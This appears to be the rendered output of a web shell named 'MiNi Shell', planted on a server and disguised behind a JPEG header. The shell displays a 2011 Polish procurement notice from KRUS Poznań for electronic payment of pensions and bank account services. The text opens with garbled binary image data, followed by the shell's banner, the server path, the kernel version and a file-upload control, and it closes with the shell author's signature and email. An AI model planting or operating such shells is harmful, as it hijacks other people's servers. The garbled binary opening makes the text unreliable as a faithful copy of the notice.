JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/114410-N-2011.html

<p class="kh_header"><b>Poznań: Świadczenie usług polegających na wypłacie drogą elektroniczną  świadczeń emerytalno - rentowych, świadczeń krótkoterminowych oraz wynagrodzeń pracowniczych na rachunki oszczędnościowo - rozliczeniowe (ROR) w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej oraz bankowa obsługa Funduszu Składkowego - obejmująca prowadzenie rachunku bankowego w walucie polskiej</b><br>
<b>Numer ogłoszenia: 114410 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu , ul. Św. Marcin 46/50, 60-959 Poznań, woj. wielkopolskie, tel. 061 8530920.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług polegających na wypłacie drogą elektroniczną  świadczeń emerytalno - rentowych, świadczeń krótkoterminowych oraz wynagrodzeń pracowniczych na rachunki oszczędnościowo - rozliczeniowe (ROR) w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej oraz bankowa obsługa Funduszu Składkowego - obejmująca prowadzenie rachunku bankowego w walucie polskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca  na wypłacie drogą elektroniczną  świadczeń emerytalno - rentowych, świadczeń krótkoterminowych oraz wynagrodzeń pracowniczych  na rachunki oszczędnościowo - rozliczeniowe (ROR) w bankach, mających siedzibę  na terenie Rzeczpospolitej Polskiej ( część 1 zamówienia)  oraz bankowa obsługa funduszu składkowego - obejmująca prowadzenie rachunku bankowego w walucie polskiej ( część 2 zamówienia). 
2. Liczba  świadczeniobiorców  w  zakresie części 1 zamówienia oraz  przelewów w zakresie  części 2 zamówienia są wartościami szacunkowymi i mogą ulec zmianie w zależności od zmiany liczby obsługiwanych świadczeniobiorców jak również ilości realizowanych przelewów.
3. Wspólny Słownik Zamówień  CPV: 66.11.00.00-4 ( Usługi bankowe ) 
4. Szczegółowy opis przedmiotu zamówienia w zakresie części 1 zamówienia 
4.1.Przedmiotem zamówienia  jest świadczenie usługi w zakresie przekazywania świadczeń emerytalno - rentowych, świadczeń krótkoterminowych ( m.in. zasiłki chorobowe, macierzyńskie, jednorazowe odszkodowania) oraz  wynagrodzeń pracowników  na rachunki oszczędnościowo - rozliczeniowe do banków wskazanych przez świadczeniobiorców i pracowników z terenu działania Oddziału Regionalnego Kasy Rolniczego Ubezpieczenia Społecznego w Poznaniu drogą elektroniczną z wykorzystaniem zbioru o strukturze wymaganej przez system Video -Tel.  
4.2.Szacunkowa łączna ilość pojedynczych operacji uznaniowych w okresie 30 miesięcy wykonywania zamówienia wyniesie  około 1.979.000 szt.
4.3.Liczba operacji uznaniowych jest wartością szacunkową i może ulec zmianie w zależności od zmiany liczby obsługiwanych świadczeniobiorców i pracowników.
4.4.Wypłata świadczeń o których mowa w pkt 4.1 odbywać się będzie w następujących terminach:
a) wypłata świadczeń emerytalno - rentowych  do:
- 10 dnia każdego miesiąca     - termin 10,
- 15 dnia każdego miesiąca     - termin 15,
- 20 dnia każdego miesiąca     - termin 20,
- 25 dnia każdego miesiąca     - termin 25,
b)wypłata  świadczeń emerytalno-rentowych poza terminami płatności następować będzie: 
- dowolnego dnia roboczego miesiąca, w zależności od potrzeby - max. 5 razy w tygodniu
c)wypłata świadczeń krótkoterminowych  w terminie :
- ok. 05 dnia  każdego miesiąca     
- ok. 18 dnia  każdego miesiąca     
- ok. 28 dnia każdego miesiąca
- oraz  dowolnego dnia roboczego miesiąca, w zależności od potrzeby
d)wypłaty wynagrodzeń pracowników do końca  miesiąca kalendarzowego,
4.5.Zamawiający przekazywać będzie środki niezbędne do zabezpieczenia: 
a)wypłaty świadczeń emerytalno-rentowych, na wskazany rachunek Wykonawcy,  najpóźniej na  2 dni robocze przed terminem płatności świadczeń (dot. terminów 10 , 15, 20 i 25 ),
b)wypłaty świadczeń emerytalno-rentowych poza terminami płatności oraz świadczeń krótkoterminowych, na wskazany rachunek Wykonawcy, najpóźniej na 1 dzień roboczy przed terminem płatności, nie później niż do pierwszej sesji rozliczeniowej w dniu, w którym mają być  środki uruchomione na rachunki oszczędnościowo - rozliczeniowe, 
c)wypłaty wynagrodzeń,  na 1 dzień roboczy przed terminem płatności, nie później niż do pierwszej sesji rozliczeniowej w dniu w którym mają być  środki uruchomione na rachunki oszczędnościowo -rozliczeniowe.
4.6.Przekazywanie świadczeń i wynagrodzeń określonych w pkt 4.4  będzie się odbywało na podstawie zbiorczej dyspozycji przelewu środków finansowych na rachunek rozliczeniowy Wykonawcy, z którego następnie Wykonawca przekaże świadczenia i wynagrodzenia na wskazane przez Zamawiającego rachunki ROR.
4.7.Zamawiający nie przewiduje założenia odrębnego rachunku u Wykonawcy. Wykonawca wskaże  rachunek bankowy, na który Zamawiający będzie przekazywał środki finansowe oraz z którego następnie będą przekazywane świadczenia na rachunki oszczędnościowo-rozliczeniowe świadczeniobiorców i pracowników. 
4.8.Zamawiający przekaże do Wykonawcy zaszyfrowane pliki np. certyfikatem w formacie Video-Tel bezpieczną pocztą internetową lub równoważną. 
4.9.W razie zaistnienia nieprzewidzianych okoliczności uniemożliwiających przekazywanie plików drogą elektroniczną w  celu zapewnienia ciągłości wypłat, Wykonawca zobowiązany jest do odbioru z siedziby Zamawiającego plików za pomocą  elektronicznych nośników informacji. 
4.10.Wykonawca zobowiązuje się do przekazania otrzymanych środków na konta oszczędnościowo - rozliczeniowe  świadczeniobiorców  najbliższą sesją rozliczeniową, po otrzymaniu od Zamawiającego  środków finansowych (w tym samym lub najpóźniej w następnym dniu roboczym).
4.11.W przypadku pisemnego lub telefonicznego potwierdzonego faksem polecenia zwrotu świadczenia lub wynagrodzenia wydanego przez Zamawiającego przed terminem wypłaty Wykonawca przekaże Zamawiającemu środki niewypłaconego świadczenia / wynagrodzenia niezwłocznie, nie później niż następnego dnia roboczego. 
4.12.Wykonawca ponosi odpowiedzialność za przyjęte zlecenie wypłat do wysokości środków przekazanych na jego rachunek bankowy  oraz za szkody z tytułu zawinionego przez siebie opóźnienia realizacji dyspozycji przelewów 
4.13.Wykonawca jest zobowiązany do korzystania z powierzonych przez Zamawiającego środków pieniężnych wyłącznie do realizacji przedmiotu zamówienia.
4.14.W razie wypłacenia środków pieniężnych osobie nieuprawnionej, Wykonawca pokrywa szkodę wyrządzoną Zamawiającemu w pełnej wysokości.
4.15.Zwroty świadczeń i wynagrodzeń wpływające na konto Wykonawcy ( likwidacja rachunku ROR lub inne przyczyny), zostaną przekazane na konto bankowe Zamawiającego, nie później niż w następnym dniu po otrzymaniu zwrotu. Za zwroty Wykonawca nie będzie pobierał żadnych dodatkowych opłat.
4.16.W przypadku niedotrzymania terminów wypłat świadczeń/wynagrodzeń, Wykonawca zobowiązany będzie do zapłacenia odszkodowania w wysokości stanowiącej równowartość odsetek obliczonych od kwoty niezrealizowanych w terminie pojedynczych operacji uznaniowych, za każdy dzień opóźnienia, według stopy procentowej odsetek ustawowych.
4.17.Cena  świadczonych usług w trakcie trwania umowy nie ulegnie zmianie.
4.18.Wykonawca zobowiązany jest do przestrzegania przepisów wynikających z ustawy o ochronie danych osobowych ( Dz.U. z 2002r. Nr 101 poz.926 z poźn. zm.)

5. Szczegółowy opis przedmiotu zamówienia w zakresie części 2  zamówienia 
5.1 Realizacja przedmiotu zamówienia  będzie polegała na świadczeniu usługi:
a) otwarcia i prowadzenia na rzecz Zamawiającego rachunku bankowego  Funduszu Składkowego Ubezpieczenia Społecznego Rolników 
b) przechowywaniu środków pieniężnych i prowadzeniu rozliczeń pieniężnych na podstawie zleceń za pośrednictwem Systemu Bankowości Elektronicznej ( polecenia przelewu do innego banku w formie elektronicznej, wyciągi elektroniczne 
c) instalacji, szkoleniu oraz serwisie w zakresie oprogramowania umożliwiającego składanie dyspozycji za pośrednictwem bankowości elektronicznej w siedzibie Zamawiającego 
5.2 Przeciętna  średniomiesięczna wysokość salda na rachunku bankowym wynosi około 80.000,00 - 100.000,00 zł

6. Zamawiający zastrzega, iż całość zamówienia z uwagi na jego specyfikę nie może być powierzona do wykonania przez podwykonawców..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  żąda od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony jeżeli Wykonawca wykaże, że osiągnął dodatni wynik finansowy za ostatni rok obrotowy, za który sporządzono sprawozdanie roczne tj. przedłoży sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również z opinią o badanym sprawozdaniu,  a w przypadku Wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy- zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ
2. Zaakceptowany przez Wykonawcę wzór umowy, który stanowi załącznik nr 4 do SIWZ w zakresie części 1 zamówienia i/ lub  oświadczenie o akceptacji istotnych postanowień umowy w zakresie części 2  zamówienia zawarte w formularzu ofertowym stanowiącym załącznik nr 3 do SWIZ
3. Oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza - pełnomocnictwa (upoważnienia) do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile oferta została podpisana przez osoby nie umocowane do tych czynności w dokumentach rejestracyjnych  firmy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Do umowy mogą być wprowadzone tylko  zmiany, dotyczące:
a)ilości pojedynczych operacji uznaniowych w zakresie części 1 zamówienia 
b)ilości przelewów  określonych w części 2 zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu ul. Św. Marcin 46/50, 60-959 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2011 godzina 10:00, miejsce: Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu ul. Św. Marcin 46/50, 60-959 Poznań ,piętro VI, pok.604.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług polegających na wypłacie drogą elektroniczną  świadczeń emerytalno - rentowych, świadczeń krótkoterminowych oraz wynagrodzeń pracowniczych na rachunki oszczędnościowo - rozliczeniowe (ROR) w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej oraz bankowa obsługa Funduszu Składkowego - obejmująca prowadzenie rachunku bankowego w walucie polskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest świadczenie usługi w zakresie przekazywania świadczeń emerytalno - rentowych, świadczeń krótkoterminowych ( m.in. zasiłki chorobowe, macierzyńskie, jednorazowe odszkodowania) oraz  wynagrodzeń pracowników  na rachunki oszczędnościowo - rozliczeniowe do banków wskazanych przez świadczeniobiorców i pracowników z terenu działania Oddziału Regionalnego Kasy Rolniczego Ubezpieczenia Społecznego w Poznaniu drogą elektroniczną z wykorzystaniem zbioru o strukturze wymaganej przez system Video -Tel.  Szacunkowa łączna ilość pojedynczych operacji uznaniowych w okresie 30 miesięcy wykonywania zamówienia wyniesie  około 1.979.000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług polegających na wypłacie drogą elektroniczną  świadczeń emerytalno - rentowych, świadczeń krótkoterminowych oraz wynagrodzeń pracowniczych na rachunki oszczędnościowo - rozliczeniowe (ROR) w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej oraz bankowa obsługa Funduszu Składkowego - obejmująca prowadzenie rachunku bankowego w walucie polskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja przedmiotu zamówienia  będzie polegała na świadczeniu usługi:
a) otwarcia i prowadzenia na rzecz Zamawiającego rachunku bankowego  Funduszu Składkowego Ubezpieczenia Społecznego Rolników 
b) przechowywaniu środków pieniężnych i prowadzeniu rozliczeń pieniężnych na podstawie zleceń za pośrednictwem Systemu Bankowości Elektronicznej ( polecenia przelewu do innego banku w formie elektronicznej, wyciągi elektroniczne 
c) instalacji, szkoleniu oraz serwisie w zakresie oprogramowania umożliwiającego składanie dyspozycji za pośrednictwem bankowości elektronicznej w siedzibie Zamawiającego 
Przeciętna  średniomiesięczna wysokość salda na rachunku bankowym wynosi około 80.000,00 - 100.000,00 zł.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com